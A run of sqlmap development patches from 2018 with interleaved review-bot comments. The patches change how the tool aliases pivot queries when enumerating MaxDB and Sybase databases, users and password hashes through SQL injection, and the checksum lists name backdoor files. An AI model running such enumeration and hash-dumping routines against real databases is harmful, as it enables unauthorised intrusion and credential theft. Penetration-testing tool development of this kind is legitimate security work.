@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -efef2534b513cac460d62a2709dad5b5 lib/core/settings.py +85acbc0a45352eeb4ebe78dbef74918b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -173,7 +173,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py -34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py +1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py From 721046831b83f38e7fc05c1ae08abfe425cdd629 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Sep 2018 22:15:29 +0200 Subject: [PATCH 294/428] Minor patch --- lib/core/settings.py | 2 +- lib/utils/pivotdumptable.py | 7 ++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b2511829db0..c54d6687962 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.33" +VERSION = "1.2.9.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 231214cae86..0ced0b62cea 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -11,6 +11,7 @@ from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue @@ -174,10 +175,10 @@ def _(column, pivotValue): warnMsg += "will display partial output" logger.warn(warnMsg) - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " + except SqlmapConnectionException, ex: + errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex) errMsg += "will display partial output" - errMsg += "'%s'" % e + logger.critical(errMsg) return entries, lengths diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7e54375c3fb..6cb89c704d4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85acbc0a45352eeb4ebe78dbef74918b lib/core/settings.py +de9fa04f019f5d14db8589e1a61b3064 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
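Review bot: The rewritten handler at the end of the hunk keeps the Python 2-only `except SqlmapConnectionException, ex:` form; `except SqlmapConnectionException as ex:` is accepted from 2.6 on and is the only form Python 3 accepts, so the line being touched is the natural place to switch. The message change itself is fine, but a connection failure is logged at `critical` while the function still returns the partial `entries, lengths`, so callers cannot tell a partial result from a complete one; if that is intended, a short comment above the `return` saying so would save the next reader a detour. The enclosing function starts before the hunk.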
@@ -112,7 +112,7 @@ f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py +b0105f091c2e919c3cdb549cb29fd194 lib/utils/pivotdumptable.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py From e69735476515c0af4009b61e849b3d79581c1133 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Sep 2018 23:06:45 +0200 Subject: [PATCH 295/428] Fixing non-resumal of MsSQL/Sybase/MaxDB enumeration queries --- lib/core/option.py | 1 + lib/core/settings.py | 2 +- lib/core/target.py | 8 ++++++++ lib/utils/pivotdumptable.py | 6 +++--- plugins/dbms/maxdb/enumeration.py | 11 ++++------- plugins/dbms/sybase/enumeration.py | 14 +++++--------- plugins/generic/users.py | 10 ++++------ txt/checksum.md5 | 14 +++++++------- 8 files changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 5bd75098740..d033ffdeb10 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1713,6 +1713,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.absFilePaths = set() kb.adjustTimeDelay = None kb.alerted = False + kb.aliasName = randomStr() kb.alwaysRefresh = None kb.arch = None kb.authHeader = None diff --git a/lib/core/settings.py b/lib/core/settings.py index c54d6687962..5b589fd7e76 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.34" +VERSION = "1.2.9.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 4653cb6b027..cb3f755a621 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -692,6 +692,13 @@ def _createTargetDirs(): _createFilesDir() _configureDumper() +def _setAuxOptions(): + """ + Setup auxiliary (host-dependent) options + """ + + kb.aliasName = randomStr(seed=hash(conf.hostname or "")) + def _restoreMergedOptions(): """ Restore merged options (command line, configuration file and default values) @@ -745,3 +752,4 @@ def setupTargetEnv(): _resumeHashDBValues() _setResultsFile() _setAuthCred() + _setAuxOptions() \ No newline at end of file diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 0ced0b62cea..03e2226a8c5 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -32,7 +32,7 @@ from lib.core.unescaper import unescaper from lib.request import inject -def pivotDumpTable(table, colList, count=None, blind=True): +def pivotDumpTable(table, colList, count=None, blind=True, alias=None): lengths = {} entries = {} @@ -89,7 +89,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if not validPivotValue: for column in colList: infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column + infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "") logger.info(infoMsg) query = dumpNode.count2 % (column, table) 
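Review bot: `_setAuxOptions` seeds the alias with `hash(conf.hostname or "")`, which is only stable across runs under CPython 2 without `-R`; the value differs between 32- and 64-bit builds and is randomised per process on Python 3, so a resumed session may query a different alias than the one its stored results were produced with. Since the purpose of the commit is a host-stable alias, a content digest is safer, e.g. `kb.aliasName = randomStr(seed=int(hashlib.md5((conf.hostname or "").encode("utf8")).hexdigest(), 16))` with `import hashlib` added at the top of the module (adjust to whatever form `randomStr` expects for `seed`, which is not visible here). The new file also loses its trailing newline on the `_setAuxOptions()` call (`\ No newline at end of file`); worth restoring.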
@@ -100,7 +100,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): validColumnList = True if value == count: - infoMsg = "using column '%s' as a pivot " % column + infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "") infoMsg += "for retrieving row data" logger.info(infoMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index c0442f7be3e..16f3e1068b7 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -43,9 +43,8 @@ def getDbs(self): logger.info(infoMsg) rootQuery = queries[DBMS.MAXDB].dbs - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True) if retVal: kb.data.cachedDbs = retVal[0].values()[0] @@ -79,9 +78,8 @@ def getTables(self, bruteForce=None): rootQuery = queries[DBMS.MAXDB].tables for db in dbs: - randStr = randomStr() query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=True) if retVal: for table in retVal[0].values()[0]: 
@@ -202,15 +200,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - randStr = randomStr() query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=True) if retVal: table = {} columns = {} - for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): + for columnname, datatype, length in zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]): columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) table[tbl] = columns diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 2432598b75c..a1febb716ee 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -38,7 +38,6 @@ def getUsers(self): rootQuery = queries[DBMS.SYBASE].users - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -47,7 +46,7 @@ def getUsers(self): blinds = (True,) for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: kb.data.cachedUsers = retVal[0].values()[0] 
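Review bot: The MaxDB calls in this hunk (and in the `getDbs`/`getTables` hunks above) switch to the shared `kb.aliasName` but do not pass `alias=kb.aliasName` to `pivotDumpTable`, unlike the Sybase callers changed in the same commit, so the `fetching number of distinct values for column '...'` messages will still print the random alias prefix for MaxDB; append `, alias=kb.aliasName` to the three `pivotDumpTable(...)` calls for consistency. With `randStr` gone from this module the `randomStr` import may now be unused — check the import block, which is outside the hunk. `getColumns` starts before the hunk.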
@@ -94,7 +93,6 @@ def getDbs(self): logger.info(infoMsg) rootQuery = queries[DBMS.SYBASE].dbs - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -103,7 +101,7 @@ def getDbs(self): blinds = [True] for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: kb.data.cachedDbs = retVal[0].values()[0] @@ -146,9 +144,8 @@ def getTables(self, bruteForce=None): for db in dbs: for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: for table in retVal[0].values()[0]: 
@@ -278,15 +275,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod logger.info(infoMsg) for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: table = {} columns = {} - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): + for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) table[safeSQLIdentificatorNaming(tbl)] = columns diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 45ac345752c..9ff861908bb 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py 
@@ -187,13 +187,12 @@ def getPasswordHashes(self): query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() getCurrentThreadData().disableStdOut = True - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: @@ -228,13 +227,12 @@ def getPasswordHashes(self): if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): password = "0x%s" % hexencode(password, conf.encoding).upper() if user not in kb.data.cachedUsersPasswords: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6cb89c704d4..ac59b80db0e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
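Review bot: Both `pivotDumpTable(...)` calls in these hunks omit `alias=kb.aliasName`, which the Sybase enumeration hunks in this same commit pass, so the column-name log lines for the password-hash query will still show the alias prefix; append `, alias=kb.aliasName` to each call. Since `randStr` is no longer assigned here, the `randomStr` import may be unused in this module too — verify, as the import block is outside the hunk. `getPasswordHashes` begins and ends outside both hunks.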
@@ -43,17 +43,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -c59c0bfccf3e906564d82adf1fcd17de lib/core/option.py +2f2b2286f82028cf36ace9be3af06bf9 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -de9fa04f019f5d14db8589e1a61b3064 lib/core/settings.py +279a9ae0ba5b11e48fa3e3c7fc0f6173 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -248bd121e0565318e1efaff54aa427bc lib/core/target.py +62bc180e3e828949ffb342a8f756c183 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -112,7 +112,7 @@ f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -b0105f091c2e919c3cdb549cb29fd194 lib/utils/pivotdumptable.py +527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 
@@ -157,7 +157,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py +c5728157a49a4a3a98d414f453bb347e plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -199,7 +199,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py +6a675a1eb50121a3290e77f0e83a78b3 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -217,7 +217,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py +4db140069923afbae38fd93e37c00248 plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From 4b698748f7c405d75708effd4c1e89b85c911774 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 21 Sep 2018 23:25:25 +0200 Subject: [PATCH 296/428] Fixes #3247 --- lib/core/settings.py | 2 +- plugins/dbms/maxdb/enumeration.py | 2 +- plugins/dbms/sybase/enumeration.py | 6 +++--- plugins/generic/entries.py | 5 +---- txt/checksum.md5 | 8 ++++---- 5 files changed, 10 insertions(+), 13 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5b589fd7e76..5ff59fd4552 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.35" +VERSION = "1.2.9.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 16f3e1068b7..da2a502c115 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -191,7 +191,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index a1febb716ee..f7d5b0970b7 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -207,7 +207,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod raise SqlmapNoneDataException(errMsg) for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) + tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) if bruteForce: resumeAvailable = False 
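Review bot: `tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)` rewrites the list it is iterating and relies on `index()` locating the not-yet-rewritten element, which is fragile when names repeat or a sanitised name equals a later raw one; unless something else holds a reference to `tblList`, `tblList = [safeSQLIdentificatorNaming(tbl, True) for tbl in tblList]` expresses the intent directly. Only the `True` argument is new in this commit, so this is a follow-up rather than a blocker. The enclosing `getColumns` continues beyond the hunk.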
@@ -265,7 +265,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue @@ -285,7 +285,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) - table[safeSQLIdentificatorNaming(tbl)] = columns + table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table break diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index abf2003bbb5..80230ce0f9c 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -129,10 +129,7 @@ def dumpTable(self, foundData=None): else: kb.dumpTable = "%s.%s" % (conf.db, tbl) - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: + if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) 
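Review bot: Collapsing the condition onto a single line leaves `safeSQLIdentificatorNaming(conf.db)` evaluated three times and `safeSQLIdentificatorNaming(tbl, True)` twice in one expression, which reads worse than the wrapped form it replaces; binding each once keeps the semantics and the width: `dbName = safeSQLIdentificatorNaming(conf.db)`, `tblName = safeSQLIdentificatorNaming(tbl, True)`, then `if dbName not in kb.data.cachedColumns or tblName not in kb.data.cachedColumns[dbName] or not kb.data.cachedColumns[dbName][tblName]:`. `dumpTable` begins and ends outside the hunk.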
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ac59b80db0e..1b7e6ac5319 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -279a9ae0ba5b11e48fa3e3c7fc0f6173 lib/core/settings.py +fe3d03cf236257200f3d373babfe54d5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -157,7 +157,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -c5728157a49a4a3a98d414f453bb347e plugins/dbms/maxdb/enumeration.py +53d1bf931baa6b76198ece861e2318a3 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -199,7 +199,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -6a675a1eb50121a3290e77f0e83a78b3 plugins/dbms/sybase/enumeration.py +b856f677371a59d4a01b72bacac88032 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 
@@ -208,7 +208,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py -4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py +ea3a7f87e3e0cbc3aacbd3af4b6f5ce6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py From 459e1dd9a415ce9e1b0bba07ff1bdf4628e06b62 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 24 Sep 2018 10:26:27 +0200 Subject: [PATCH 297/428] Update related to the #3252 --- lib/controller/checks.py | 5 ----- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 8 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index e8d8b0f527a..211ae5c8f71 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -992,11 +992,6 @@ def checkFilteredChars(injection): kb.injection = popValue() def heuristicCheckSqlInjection(place, parameter): - if kb.nullConnection: - debugMsg = "heuristic check skipped because NULL connection used" - logger.debug(debugMsg) - return None - if kb.heavilyDynamic: debugMsg = "heuristic check skipped because of heavy dynamicity" logger.debug(debugMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5ff59fd4552..d442b0957eb 100644 --- 